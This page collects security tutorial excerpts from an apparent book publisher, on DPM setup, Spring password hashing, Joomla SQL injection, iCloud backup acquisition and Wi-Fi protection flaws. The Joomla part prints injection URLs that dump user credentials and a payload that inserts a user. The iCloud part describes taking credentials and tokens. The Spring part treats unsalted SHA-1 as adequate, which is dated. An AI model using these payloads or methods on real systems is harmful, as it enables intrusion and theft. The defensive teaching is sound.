Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-installing-data-protection-manager-2010
Packt
01 Jun 2011
6 min read
Save for later

Installing Data Protection Manager 2010

Packt
01 Jun 2011
6 min read
With the DPM upgrade you will face some of the same issues as with the installation such as what are the prerequisites? is your operating system patched? and is DPM 2007 fully patched and ready for the upgrade? This article will walk you through each step of the DPM installation process during the first half and the DPM 2007 to DPM 2010 upgrade in the second half. After reading this article you should know what to look for when working through the prerequisites and requirements. The goal is to ensure that your install or upgrade goes smoothly. Prerequisites In this section we will jump right into the prerequisites for DPM and how to install them as well as the two different ways to install DPM. We will also go through the DPM 2007 to DPM 2010 upgrade process. We will first visit the hardware and software requirements, and a pre-install that is needed before you are able to actually install DPM 2010. Hardware requirements DPM 2010 requires a processor of 1 GHz (dual-core or faster), 4 GB of RAM or higher, the page file should be set to 1.5 or 2 times the amount of RAM on the computer. The DPM disk space requirements are as follows: DPM installation location needs 3 GB free Database file drive needs 900 MB free System drive needs 1 GB free Disk space for protected data should be 2.5 to 3 times the size of the protected data DPM also needs to be on a dedicated, single purpose computer. Software requirements DPM has requirements of both the operating system as well as software that needs to be on the server before DPM can be installed. Let's take a look at what these requirements are. Operating system DPM 2007 can be installed on both a 32-bit and an x64-bit operating systems. However, DPM 2010 is only supported on an x64-bit operating systems. DPM can be installed on a Windows Server 2008 and Windows Server 2008 R2. It is recommended that you install DPM 2010 on Windows Server 2008 R2. DPM can be deployed in a Windows Server 2008, Windows Server 2008 R2, or Windows Server 2003 Active Directory domain. Be sure to launch the Windows update and completely patch the server before you start the DPM installation, no matter what operating system you decide to use. If you end up using Windows 2008 Server for your DPM deployment you will need to install some hotfixes before you start the DPM installation. The hotfixes are as follows: FIX: You are prompted to format the volume when a formatted volume is mounted on a NTFS folder that is located on a computer that is running Windows Server 2008 or Windows Vista (KB971254). Dynamic disks are marked as "Invalid" on a computer that is running Windows Server 2008 or Windows Vista. When you bring the disks online, take the disks offline, or restart the computer if Data Protection Manager is installed (KB962975). An application or service that uses a file system filter driver may experience function failure on a computer that is running Windows Vista, Windows Server 2003, or Windows Server 2008 (KB975759). Software By default, DPM will install any software prerequisites automatically if it is not enabled or installed. Sometimes these software prerequisites might fail during the DPM setup. If they do, you can install these manually. Visit the Microsoft TechNet site for detailed information on installing the software prerequisites. The following is a list of the software that DPM requires before it can be installed: Microsoft .NET Framework 3.5 with Service Pack 1 (SP1) Microsoft Visual C++ 2008 Redistributable Windows PowerShell 2.0 Windows Installer 4.5 or later versions Windows Single Instance Store (SIS) Microsoft Application Error Reporting NOTE: It is recommended that you manually install Single Instance Store on your server before you even begin the DPM 2010 installation. We shall see a step by step installation along with a detailed explanation of Single Instance Store. User privilege requirement The server that you plan to install DPM on must be joined to a domain before you install the DPM software. In order to join the server to the domain you need to have at least domain administrative privileges. You also need to have administrative privileges on the local server to install the DPM software. Restrictions DPM has to be installed on a dedicated server. It is best to make sure that DPM is the only server role running on the server you use for it. You will run into issues if you try to install DPM on a server with other roles on it. The following are the restrictions you need to pay attention to when installing DPM: DPM should not be installed on a domain controller (not recommended) DPM cannot be installed on an Exchange server DPM cannot be installed on a server with System Center Operations Manager installed on it The server you install on cannot be a node in a cluster There is one exception—you can install DPM on a domain controller and make it work but this is not supported by Microsoft. Single Instance Store Before you install DPM on your server, it is important to install a technology called Single Instance Store (SIS). SIS will ensure you get the maximum performance out of your disk space and reduce bandwidth needs on DPM. SIS is a technology that keeps the overhead of handling duplicate files low. This is often referred to as de-duplication. SIS is used to eliminate data duplication by storing only one copy of files on backup storage media. SIS is used in storage, mail, and backup solutions such as DPM. SIS helps to lower the costs of bandwidth when copying data across a network as well as needed storage space. Microsoft has used a single installation store in Exchange since version 4.0. SIS searches a hard disk and identifies duplicate files. SIS then saves only one copy of the files to a central location such as a DPM storage pool. SIS will then replace other copies of the files with pointers that direct you to the copy of the files the SIS repository already has stored. Installing Single Instance Store (SIS) The following procedure walks you through the steps required to install SIS: Click on Start and then click on Run. In the Run dialog box, type CMD.exe and press OK: At the command prompt type the following: start /wait ocsetup.exe SIS-Limited /quiet /norestart And then press Enter. (Move the mouse over the image to enlarge it.) Restart the server. To ensure the installation of SIS went okay, check for the existence of the SIS registry key. Click on Start, then click Run. In the Run dialog box, type regedit and press OK. Navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices SIS: If the SIS key is shown (as in the screenshot) in the registry it would mean that Single Instance Store (SIS) is installed properly and you can be sure to get the maximum performance out of your disk space on the DPM server.
Read more
  • 0
  • 0
  • 10231

article-image-spring-security-configuring-secure-passwords
Packt
24 May 2010
6 min read
Save for later

Encode your password with Spring Security 3

Packt
24 May 2010
6 min read
This article by Peter Mularien is an excerpt from the book Spring Security 3. In this article, we will: Examine different methods of configuring password encoding Understand the password salting technique of providing additional security to stored passwords (For more resources on Spring, see here.) In any secured system, password security is a critical aspect of trust and authoritativeness of an authenticated principal. Designers of a fully secured system must ensure that passwords are stored in a way in which malicious users would have an impractically difficult time compromising them. The following general rules should be applied to passwords stored in a database: Passwords must not be stored in cleartext (plain text) Passwords supplied by the user must be compared to recorded passwords in the database A user's password should not be supplied to the user upon demand (even if the user forgets it) For the purposes of most applications, the best fit for these requirements involves one-way encoding or encryption of passwords as well as some type of randomization of the encrypted passwords. One-way encoding provides the security and uniqueness properties that are important to properly authenticate users with the added bonus that once encrypted, the password cannot be decrypted. In most secure application designs, it is neither required nor desirable to ever retrieve the user's actual password upon request, as providing the user's password to them without proper additional credentials could present a major security risk. Most applications instead provide the user the ability to reset their password, either by presenting additional credentials (such as their social security number, date of birth, tax ID, or other personal information), or through an email-based system. Storing other types of sensitive information Many of the guidelines listed that apply to passwords apply equally to other types of sensitive information, including social security numbers and credit card information (although, depending on the application, some of these may require the ability to decrypt). It's quite common for databases storing this type of information to represent it in multiple ways, for example, a customer's full 16-digit credit card number would be stored in a highly encrypted form, but the last four digits might be stored in cleartext (for reference, think of any internet commerce site that displays XXXX XXXX XXXX 1234 to help you identify your stored credit cards). You may already be thinking ahead and wondering, given our (admittedly unrealistic) approach of using SQL to populate our HSQL database with users, how do we encode the passwords? HSQL, or most other databases for that matter, don't offer encryption methods as built-in database functions. Typically, the bootstrap process (populating a system with initial users and data) is handled through some combination of SQL loads and Java code. Depending on the complexity of your application, this process can get very complicated. For the JBCP Pets application, we'll retain the embedded-database declaration and the corresponding SQL, and then add a small bit of Java to fire after the initial load to encrypt all the passwords in the database. For password encryption to work properly, two actors must use password encryption in synchronization ensuring that the passwords are treated and validated consistently. Password encryption in Spring Security is encapsulated and defined by implementations of the o.s.s.authentication.encoding.PasswordEncoder interface. Simple configuration of a password encoder is possible through the <password-encoder> declaration within the <authentication-provider> element as follows: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder hash="sha"/> </authentication-provider></authentication-manager> You'll be happy to learn that Spring Security ships with a number of implementations of PasswordEncoder, which are applicable for different needs and security requirements. The implementation used can be specified using the hash attribute of the <password-encoder> declaration. The following table provides a list of the out of the box implementation classes and their benefits. Note that all implementations reside in the o.s.s.authentication. encoding package. Implementation class Description hash value PlaintextPasswordEncoder Encodes the password as plaintext. Default DaoAuthenticationProvider password encoder. plaintext Md4PasswordEncoder PasswordEncoder utilizing the MD4 hash algorithm. MD4 is not a secure algorithm-use of this encoder is not recommended. md4 Md5PasswordEncoder PasswordEncoder utilizing the MD5 one-way encoding algorithm. md5 ShaPasswordEncoder PasswordEncoder utilizing the SHA one-way encoding algorithm. This encoder can support confi gurable levels of encoding strength. Sha   sha-256 LdapShaPasswordEncoder Implementation of LDAP SHA and LDAP SSHA algorithms used in integration with LDAP authentication stores. {sha}   {ssha}   As with many other areas of Spring Security, it's also possible to reference a bean definition implementing PasswordEncoder to provide more precise configuration and allow the PasswordEncoder to be wired into other beans through dependency injection. For JBCP Pets, we'll need to use this bean reference method in order to encode the bootstrapped user data. Let's walk through the process of configuring basic password encoding for the JBCP Pets application. Configuring password encoding Configuring basic password encoding involves two pieces—encrypting the passwords we load into the database after the SQL script executes, and ensuring that the DaoAuthenticationProvider is configured to work with a PasswordEncoder. Configuring the PasswordEncoder First, we'll declare an instance of a PasswordEncoder as a normal Spring bean: <bean class="org.springframework.security.authentication. encoding.ShaPasswordEncoder" id="passwordEncoder"/> You'll note that we're using the SHA-1 PasswordEncoder implementation. This is an efficient one-way encryption algorithm, commonly used for password storage. Configuring the AuthenticationProvider We'll need to configure the DaoAuthenticationProvider to have a reference to the PasswordEncoder, so that it can encode and compare the presented password during user login. Simply add a <password-encoder> declaration and refer to the bean ID we defined in the previous step: <authentication-manager alias="authenticationManager"> <authentication-provider user-service-ref="jdbcUserService"> <password-encoder ref="passwordEncoder"/> </authentication-provider></authentication-manager> Try to start the application at this point, and then try to log in. You'll notice that what were previously valid login credentials are now being rejected. This is because the passwords stored in the database (loaded with the bootstrap test-users-groupsdata. sql script) are not stored in an encrypted form that matches the password encoder. We'll need to post-process the bootstrap data with some simple Java code. Writing the database bootstrap password encoder The approach we'll take for encoding the passwords loaded via SQL is to have a Spring bean that executes an init method after the embedded-database bean is instantiated. The code for this bean, com.packtpub.springsecurity.security. DatabasePasswordSecurerBean, is fairly simple. public class DatabasePasswordSecurerBean extends JdbcDaoSupport { @Autowired private PasswordEncoder passwordEncoder; public void secureDatabase() { getJdbcTemplate().query("select username, password from users", new RowCallbackHandler(){ @Override public void processRow(ResultSet rs) throws SQLException { String username = rs.getString(1); String password = rs.getString(2); String encodedPassword = passwordEncoder.encodePassword(password, null); getJdbcTemplate().update("update users set password = ? where username = ?", encodedPassword,username); logger.debug("Updating password for username: "+username+" to: "+encodedPassword); } }); } } The code uses the Spring JdbcTemplate functionality to loop through all the users in the database and encode the password using the injected PasswordEncoder reference. Each password is updated individually.
Read more
  • 0
  • 0
  • 10184

article-image-preventing-sql-injection-attacks-your-joomla-websites
Packt
23 Oct 2009
6 min read
Save for later

Preventing SQL Injection Attacks on your Joomla Websites

Packt
23 Oct 2009
6 min read
Introduction Mark Twain once said, "There are only two certainties in life-death and taxes." Even in web security there are two certainties: It's not "if you are attacked", but "when and how" your site will be taken advantage of. There are several types of attacks that your Joomla! site may be vulnerable to such as CSRF, Buffer Overflows, Blind SQL Injection, Denial of Service, and others that are yet to be found. The top issues in PHP-based websites are: Incorrect or invalid (intentional or unintentional) input Access control vulnerabilities Session hijacks and attempts on session IDs SQL Injection and Blind SQL Injection Incorrect or ignored PHP configuration settings Divulging too much in error messages and poor error handling Cross Site Scripting (XSS) Cross Site Request Forgery, that is CSRF (one-click attack) SQL Injections SQL databases are the heart of Joomla! CMS. The database holds the content, the users' IDs, the settings, and more. To gain access to this valuable resource is the ultimate prize of the hacker. Accessing this can gain him/her an administrative access that can gather private information such as usernames and passwords, and can allow any number of bad things to happen. When you make a request of a page on Joomla!, it forms a "query" or a question for the database. The database is unsuspecting that you may be asking a malformed question and will attempt to process whatever the query is. Often, the developers do not construct their code to watch for this type of an attack. In fact, in the month of February 2008, twenty-one new SQL Injection vulnerabilities were discovered in the Joomla! land. The following are some examples presented for your edification. Using any of these for any purpose is solely your responsibility and not mine: Example 1 index.php?option=com_****&Itemid=name&cmd=section&section=-  000/**/union+select/**/000,111,222,      concat(username,0x3a,password),0,     concat(username,0x3a,password)/**/from/**/jos_users/* Example 2 index.php?option=com_****&task=****&Itemid=name&catid=97&aid=- 9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/ concat(username,0x3a,password),0x3a,password, 0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/ from/**/jos_users/* Both of these will reveal, under the right set of circumstances, the usernames and passwords in your system. There is a measure of protection in Joomla! 1.0.13, with an encryption scheme that will render the passwords useless. However, it does not make sense to allow extensions that are vulnerable to remain. Yielding ANY kind of information like this is unacceptable. The following screenshot displays the results of the second example running on a test system with the vulnerable extension. The two pieces of information are the username that is listed as Author, and the Hex string (partially blurred) that is the hashed password: You can see that not all MD5 hashes can be broken easily. Though it won't be shown here, there is a website available where you enter your hash and it attempts to crack it. It supports several popular hashes. When I entered this hash (of a password) into the tool, I found the password to be Anthony. It's worth noting that this hash and its password are a result of a website getting broken into, prompting the user to search for the "hash" left behind, thus yielding the password. The important news, however, is that if you are using Joomla! 1.0.13 or greater, the password's hash is now calculated with a "salt", making it nearly impossible to break. However, the standard MD5 could still be broken with enough effort in many cases. For more information about salting and MD5 see:http://www.php.net/md5. For an interesting read on salting, you may wish to read this link:www.governmentsecurity.org/forum/lofiversion/index.php/t19179.htm SQL Injection is a query put to an SQL database where data input was expected AND the application does not correctly filter the input. It allows hijacking of database information such as usernames and passwords, as we saw in the earlier example. Most of these attacks are based on two things. First, the developers have coding errors in their code, or they potentially reused the code from another application, thus spreading the error. The other issue is the inadequate validation of input. In essence, it means trusting the users to put in the RIGHT stuff, and not put in queries meant to harm the system. User input is rarely to be trusted for this reason. It should always be checked for proper format, length, and range. There are many ways to test for vulnerability to an SQL Injection, but one of the most common ones is as follows: In some cases, this may be enough to trigger a database to divulge details. This very simplistic example would not work in the login box that is shown. However, if it were presented to a vulnerable extension in a manner such as the following it might work: <FORM action=http://www.vulnerablesite.com/Search.php method=post><input type=hidden name=A value="me' or 1=1--"></FORM> This "posting" method (presented as a very generic exploit and not meant to work per se in Joomla!) will attempt to break into the database by putting forward queries that would not necessarily be noticed. But why 1=1- - ? According to PHP.NET, "It is a common technique to force the SQL parser to ignore the rest of the query written by the developer with-- which is the comment sign in SQL." You might be thinking, "So what if my passwords are hashed? They can get them but they cannot break them!" This is true, but if they wanted it badly, nothing keeps them from doing something such as this: INSERT INTO jos_mydb_users  ('email','password','login_id','full_name')  VALUES ('johndoe@email.com','default','Jdoe','John Doe');--'; This code has a potential if inserted into a query such as this: http://www.yourdomain/vulnerable_extension//index.php?option=com_vulext INSERT INTO jos_mydb_users ('email','password','login_id','full_name') VALUES ('johndoe@email.com','default','Jdoe','John Doe');--'; Again, this is a completely bogus example and is not likely to work. But if you can get an SQL DB to divulge its information, you can get it to "accept" (insert) information it should not as well. 
Read more
  • 0
  • 0
  • 10166

article-image-evidence-acquisition-and-analysis-icloud
Packt
09 Mar 2015
10 min read
Save for later

Evidence Acquisition and Analysis from iCloud

Packt
09 Mar 2015
10 min read
This article by Mattia Epifani and Pasquale Stirparo, the authors of the book, Learning iOS Forensics, introduces the cloud system provided by Apple to all its users through which they can save their backups and other files on remote servers. In the first part of this article, we will show you the main characteristics of such a service and then the techniques to create and recover a backup from iCloud. (For more resources related to this topic, see here.) iCloud iCloud is a free cloud storage and cloud computing service designed by Apple to replace MobileMe. The service allows users to store data (music, pictures, videos, and applications) on remote servers and share them on devices with iOS 5 or later operating systems, on Apple computers running OS X Lion or later, or on a PC with Windows Vista or later. Similar to its predecessor, MobileMe, iCloud allows users to synchronize data between devices (e-mail, contacts, calendars, bookmarks, notes, reminders, iWork documents, and so on), or to make a backup of an iOS device (iPhone, iPad, or iPod touch) on remote servers rather than using iTunes and your local computer. The iCloud service was announced on June 6, 2011 during the Apple Worldwide Developers Conference but became operational to the public from October 12, 2011. The MobileMe service was disabled as a result on June 30, 2012 and all users were transferred to the new environment. In July 2013, iCloud had more than 320 million users. Each iCloud account has 5 GB of free storage for the owners of iDevice with iOS 5 or later and Mac users with Lion or later. Purchases made through iTunes (music, apps, videos, movies, and so on) are not calculated in the count of the occupied space and can be stored in iCloud and downloaded on all devices associated with the Apple ID of the user. Moreover, the user has the option to purchase additional storage in denominations of 20, 200, 500, or 1,000 GB. Access to the iCloud service can be made through integrated applications on devices such as iDevice and Mac computers. Also, to synchronize data on a PC, you need to install the iCloud Control Panel application, which can be downloaded for free from the Apple website. To synchronize contacts, e-mails, and appointments in the calendar on the PC, the user must have Microsoft Outlook 2007 or 2010, while for the synchronization of bookmarks they need Internet Explorer 9 or Safari. iDevice backup on iCloud iCloud allows users to make online backups of iDevices so that they will be able to restore their data even on a different iDevice (for example, in case of replacement of devices). The choice of which backup mode to use can be done directly in the settings of the device or through iTunes when the device is connected to the PC or Mac, as follows: Once the user has activated the service, the device automatically backs up every time the following scenarios occur: It is connected to the power cable It is connected to a Wi-Fi network Its screen is locked iCloud online backups are incremental through subsequent snapshots and each snapshot is the current status of the device at the time of its creation. The structure of the backup stored on iCloud is entirely analogous to that of the backup made with iTunes. iDevice backup acquisition Backups that are made online are, to all intents and purposes, not encrypted. Technically, they are encrypted, but the encryption key is stored with the encrypted files. This choice was made by Apple in order for users to be able to restore the backup on a different device than the one that created it. Currently, the acquisition of the iCloud backup is supported by two types of commercial software (Elcomsoft Phone Password Breaker (EPPB) and Wondershare Dr.Fone) and one open source tool (iLoot, which is available at https://github.com/hackappcom/iloot). The interesting aspect is that the same technique was used in the iCloud hack performed in 2014, when personal photos and videos were hacked from the respective iCloud services and released over the Internet (more information is available at http://en.wikipedia.org/wiki/2014_celebrity_photo_hack). Though there is no such strong evidence yet that describes how the hack was made, it is believed that Apple's Find my iPhone service was responsible for this and Apple did not implement any security measure to lockdown account after a particular number of wrong login attempts, which directly arises the possibility of exploitation (brute force, in this case). The tool used to brute force the iCloud password, named iBrute, is still available at https://github.com/hackappcom/ibrute, but has not been working since January 2015. Case study – iDevice backup acquisition and EPPB with usernames and passwords As reported on the software manufacturer's website, EPPB allows the acquisition of data stored on a backup online. Moreover, online backups can be acquired without having the original iOS device in hand. All that's needed to access online backups stored in the cloud service are the original user's credentials, including their Apple ID, accompanied with the corresponding password. The login credentials in iCloud can be retrieved as follows: Using social engineering techniques From a PC (or a Mac) on which they are stored: iTunes Password Decryptor (http://securityxploded.com/) WebBrowserPassView (http://www.nirsoft.net/) Directly from the device (iPhone/iPad/iPod touch) by extracting the credentials stored in the keychain Once credentials have been extracted, the download of the backup is very simple. Follow the step-by-step instructions provided in the program by entering username and password in Download backup from iCloud dialog by going to Tools | Apple | Download backup from iCloud | Password and clicking on Sign in, as shown in the following screenshot: At this point, the software displays a screen that shows all the backups present in the user account and allows you to download data. It is important to notice the possibility of using the following two options: Restore original file names: If enabled, this option interprets the contents of the Manifest.mbdb file, rebuilding the backup with the same tree structure into domains and sub-domains. If the investigator intends to carry out the analysis with traditional software for data extraction from backups, it is recommended that you disable this option because, if enabled, that software will no longer be able to parse the backup. Download only specific data: This option is very useful when the investigator needs to download only some specific information. Currently, the software supports Call history, Messages, Attachments, Contacts, Safari data, Google data, Calendar, Notes, Info & Settings, Camera Roll, Social Communications, and so on. In this case, the Restore original file names option is automatically activated and it cannot be disabled. Once you have chosen the destination folder for the download, the backup starts. The time required to download depends on the size of the storage space available to the user and the number of snapshots stored within that space. Case study – iDevice backup acquisition and EPPB with authentication token The Forensic edition of Phone Password Breaker from Elcomsoft is a tool that gives a digital forensics examiner the power to obtain iCloud data without having the original Apple ID and password. This kind of access is made possible via the use of an authentication token extracted from the user's computer. These tokens can be obtained from any suspect's computer where iCloud Control Panel is installed. In order to obtain the token, the user must have been logged in to iCloud Control Panel on that PC at the time of acquisition, so it means that the acquisition can be performed only in a live environment or in a virtualized image of the suspect computer connected to Internet. More information about this tool is available at http://www.elcomsoft.com/eppb.html. To extract the authentication token from the iCloud Control Panel, the analyst needs to use a small executable file on the machine called atex.exe. The executable file can be launched from an external pen drive during a live forensics activity. Open Command Prompt and launch the atex –l command to list all the local iCloud users as follows: Then, launch atex.exe again with the getToken parameter (-t) and enter the username of the specific local Windows user and the password for this user's Windows account. A file called icloud_token_<timestamp>.txt will be created in the directory from which atex.exe was launched. The file contains the Apple ID of the current iCloud Control Panel user and its authentication token. Now that the analyst has the authentication token, they can start the EPPB software and navigate to Tools | Apple | Download backup from iCloud | Token and copy and paste the token (be careful to copy the entire second row from the .txt file created by the atex.exe tool) into the software and click on Sign in, as shown in the following screenshot. At this point, the software shows the screen for downloading the iCloud backups stored within the iCloud space of the user, in a similar way as you provide a username and password. The procedure for the Mac OS X version is exactly the same. Just launch the atex Mac version from a shell and follow the steps shown previously in the Windows environment: sudo atex –l: This command is used to get the list of all iCloud users. sudo atex –t –u <username>: This command is used to get the authentication token for a specific user. You will need to enter the user's system password when prompted. Case study – iDevice backup acquisition with iLoot The same activity can be performed using the open source tool called iLoot (available at https://github.com/hackappcom/iloot). It requires Python and some dependencies. We suggest checking out the website for the latest version and requirements. By accessing the help (iloot.py –h), we can see the various available options. We can choose the output folder if we want to download one specified snapshot, if we want the backup being downloaded in original iTunes format or with the Domain-style directories, if we want to download only specific information (for example, call history, SMS, photos, and so on), or only a specific domain, as follows: To download the backup, you just only need to insert the account credentials, as shown in the following screenshot: At the end of the process, you will find the backup in the output folder (the default folder's name is /output). Summary In this article, we introduced the iCloud service provided by Apple to store files on remote servers and backup their iDevice devices. In particular, we showed the techniques to download the backups stored on iCloud when you know the user credentials (Apple ID and password) and when you have access to a computer where it is installed and use the iCloud Control Panel software. Resources for Article: Further resources on this subject: Introduction to Mobile Forensics [article] Processing the Case [article] BackTrack Forensics [article]
Read more
  • 0
  • 0
  • 9901

article-image-common-wlan-protection-mechanisms-and-their-flaws
Packt
07 Mar 2016
19 min read
Save for later

Common WLAN Protection Mechanisms and their Flaws

Packt
07 Mar 2016
19 min read
In this article by Vyacheslav Fadyushin, the author of the book Building a Pentesting Lab for Wireless Networks, we will discuss various WLAN protection mechanisms and the flaws present in them. To be able to protect a wireless network, it is crucial to clearly understand which protection mechanisms exist and which security flaws do they have. This topic will be useful not only for those readers who are new to Wi-Fi security, but also as a refresher for experienced security specialists. (For more resources related to this topic, see here.) Hiding SSID Let's start with one of the common mistakes done by network administrators: relying only on the security by obscurity. In the frames of the current subject, it means using a hidden WLAN SSID (short for service set identification) or simply WLAN name. Hidden SSID means that a WLAN does not send its SSID in broadcast beacons advertising itself and doesn't respond to broadcast probe requests, thus making itself unavailable in the list of networks on Wi-Fi-enabled devices. It also means that normal users do not see that WLAN in their available networks list. But the lack of WLAN advertising does not mean that a SSID is never transmitted in the air—it is actually transmitted in plaintext with a lot of packet between access points and devices connected to them regardless of a security type used. Therefore, SSIDs are always available for all the Wi-Fi network interfaces in a range and visible for any attacker using various passive sniffing tools. MAC filtering To be honest, MAC filtering cannot be even considered as a security or protection mechanism for a wireless network, but it is still called so in various sources. So let's clarify why we cannot call it a security feature. Basically, MAC filtering means allowing only those devices that have MAC addresses from a pre-defined list to connect to a WLAN, and not allowing connections from other devices. MAC addresses are transmitted unencrypted in Wi-Fi and are extremely easy for an attacker to intercept without even being noticed (refer to the following screenshot): An example of wireless traffic sniffing tool easily revealing MAC addresses Keeping in mind the extreme simplicity of changing a physical address (MAC address) of a network interface, it becomes obvious why MAC filtering should not be treated as a reliable security mechanism. MAC filtering can be used to support other security mechanisms, but it should not be used as an only security measure for a WLAN. WEP Wired equivalent privacy (WEP) was born almost 20 years ago at the same time as the Wi-Fi technology and was integrated as a security mechanism for the IEEE 802.11 standard. Like it often happens with new technologies, it soon became clear that WEP contains weaknesses by design and cannot provide reliable security for wireless networks. Several attack techniques were developed by security researchers that allowed them to crack a WEP key in a reasonable time and use it to connect to a WLAN or intercept network communications between WLAN and client devices. Let's briefly review how WEP encryption works and why is it so easy to break. WEP uses so-called initialization vectors (IV) concatenated with a WLAN's shared key to encrypt transmitted packets. After encrypting a network packet, an IV is added to a packet as it is and sent to a receiving side, for example, an access point. This process is depicted in the following flowchart: The WEP encryption process An attacker just needs to collect enough IVs, which is also a trivial task using additional reply attacks to force victims to generate more IVs. Even worse, there are attack techniques that allow an attacker to penetrate WEP-protected WLANs even without connected clients, which makes those WLANs vulnerable by default. Additionally, WEP does not have a cryptographic integrity control, which makes it vulnerable not only to attacks on confidentiality. There are numerous ways how an attacker can abuse a WEP-protected WLAN, for example: Decrypt network traffic using passive sniffing and statistical cryptanalysis Decrypt network traffic using active attacks (reply attack, for example) Traffic injection attacks Unauthorized WLAN access Although WEP was officially superseded by the WPA technology in 2003, it still can be sometimes found in private home networks and even in some corporate networks (mostly belonging to small companies nowadays). But this security technology has become very rare and will not be used anymore in future, largely due to awareness in corporate networks and because manufacturers no longer activate WEP by default on new devices. In our humble opinion, device manufacturers should not include WEP support in their new devices to avoid its usage and increase their customers' security. From the security specialist's point of view, WEP should never be used to protect a WLAN, but it can be used for Wi-Fi security training purposes. Regardless of a security type in use, shared keys always add the additional security risk; users often tend to share keys, thus increasing the risk of key compromise and reducing accountability for key privacy. Moreover, the more devices use the same key, the greater amount of traffic becomes suitable for an attacker during cryptanalytic attacks, increasing their performance and chances of success. This risk can be minimized by using personal identifiers (key, certificate) for users and devices. WPA/WPA2 Due to numerous WEP security flaws, the next generation of Wi-Fi security mechanism became available in 2003: Wi-Fi Protected Access (WPA). It was announced as an intermediate solution until WPA2 is available and contained significant security improvements over WEP. Those improvements include: Stronger encryption Cryptographic integrity control: WPA uses an algorithm called Michael instead of CRC used in WEP. This is supposed to prevent altering data packets on the fly and protects from resending sniffed packets. Usage of temporary keys: The Temporal Key Integrity Protocol (TKIP) automatically changes encryption keys generated for every packet. This is the major improvement over the static WEP where encryption keys should be entered manually in an AP config. TKIP also operates RC4, but the way how it is used was improved. Support of client authentication: The capability to use dedicated authentication servers for user and device authentication made WPA suitable for use in large enterprise networks. The support of cryptographically strong algorithm Advanced Encryption Standard (AES) was implemented in WPA, but it was not set as mandatory, only optional. Although WPA was a significant improvement over WEP, it was a temporary solution before WPA2 was released in 2004 and became mandatory for all new Wi-Fi devices. WPA2 works very similar to WPA and the main differences between WPA and WPA2 is in the algorithms used to provide security: AES became the mandatory algorithm for encryption in WPA2 instead of default RC4 in WPA TKIP used in WPA was replaced by Counter Cipher Mode with Block Chaining Message Authentication Code Protocol (CCMP) Because of the very similar workflows, WPA and WPA2 are also vulnerable to the similar or the same attacks and usually called and spelled in one word WPA/WPA2. Both WPA and WPA2 can work in two modes: pre-shared key (PSK) or personal mode and enterprise mode. Pre-shared key mode Pre-shared key or personal mode was intended for home and small office use where networks have low complexity. We are more than sure that all our readers have met this mode and that most of you use it at home to connect your laptops, mobile phones, tablets, and so on to home networks. The general idea of PSK mode is using the same secret key on an access point and on a client device to authenticate the device and establish an encrypted connection for networking. The process of WPA/WPA2 authentication using a PSK consists of four phases and is also called a 4-way handshake. It is depicted in the following diagram: WPA/WPA2 4-way handshake The main WPA/WPA2 flaw in PSK mode is the possibility to sniff a whole 4-way handshake and brute-force a security key offline without any interaction with a target WLAN. Generally, the security of a WLAN mostly depends on the complexity of a chosen PSK. Computing a PMK (short for primary master key) used in 4-way handshakes (refer to the handshake diagram) is a very time-consuming process compared to other computing operations and computing hundreds of thousands of them can take very long. But in case of a short and low complexity PSK in use, a brute-force attack does not take long even on a not-so-powerful computer. If a key is complex and long enough, cracking it can take much longer, but still there are ways to speed up this process: Using powerful computers with CUDA (short for Compute Unified Device Architecture), which allows a software to directly communicate with GPUs for computing. As GPUs are natively designed to perform mathematical operations and do it much faster than CPUs, the process of cracking works several times faster with CUDA. Using rainbow tables that contain pairs of various PSKs and their corresponding precomputed hashes. They save a lot of time for an attacker because the cracking software just searches for a value from an intercepted 4-way handshake in rainbow tables and returns a key corresponding to the given PMK if there was a match instead of computing PMKs for every possible character combination. Because WLAN SSIDs are used in 4-way handshakes analogous to a cryptographic salt, PMKs for the same key will differ for different SSIDs. This limits the application of rainbow tables to a number of the most popular SSIDs. Using cloud computing is another way to speed up the cracking process, but it usually costs additional money. The more computing power can an attacker rent (or get through another ways), the faster goes the process. There are also online cloud-cracking services available in Internet for various cracking purposes including cracking 4-way handshakes. Furthermore, as with WEP, the more users know a WPA/WPA2 PSK, the greater the risk of compromise—that's why it is also not an option for big complex corporate networks. WPA/WPA2 PSK mode provides the sufficient level of security for home and small office networks only when a key is long and complex enough and is used with a unique (or at least not popular) WLAN SSID. Enterprise mode As it was already mentioned in the previous section, using shared keys itself poses a security risk and in case of WPA/WPA2 highly relies on a key length and complexity. But there are several factors in enterprise networks that should be taken into account when talking about WLAN infrastructure: flexibility, manageability, and accountability. There are various components that implement those functions in big networks, but in the context of our topic, we are mostly interested in two of them: AAA (short for authentication, authorization, and accounting) servers and wireless controllers. WPA-Enterprise or 802.1x mode was designed for enterprise networks where a high security level is needed and the use of AAA server is required. In most cases, a RADIUS server is used as an AAA server and the following EAP (Extensible Authentication Protocol) types are supported (and several more, depending on a wireless device) with WPA/WPA2 to perform authentication: EAP-TLS EAP-TTLS/MSCHAPv2 PEAPv0/EAP-MSCHAPv2 PEAPv1/EAP-GTC PEAP-TLS EAP-FAST You can find a simplified WPA-Enterprise authentication workflow in the following diagram: WPA-Enterprise authentication Depending on an EAP-type configured, WPA-Enterprise can provide various authentication options. The most popular EAP-type (based on our own experience in numerous pentests) is PEAPv0/MSCHAPv2, which is relatively easily integrated with existing Microsoft Active Directory infrastructures and is relatively easy to manage. But this type of WPA-protection is relatively easy to defeat by stealing and bruteforcing user credentials with a rogue access point. The most secure EAP-type (at least, when configured and managed correctly) is EAP-TLS, which employs certificate-based authentication for both users and authentication servers. During this type of authentication, clients also check server's identity and a successful attack with a rogue access point becomes possible only if there are errors in configuration or insecurities in certificates maintenance and distribution. It is recommended to protect enterprise WLANs with WPA-Enterprise in EAP-TLS mode with mutual client and server certificate-based authentication. But this type of security requires additional work and resources. WPS Wi-Fi Protected Setup (WPS) is actually not a security mechanism, but a key exchange mechanism which plays an important role in establishing connections between devices and access points. It was developed to make the process of connecting a device to an access point easier, 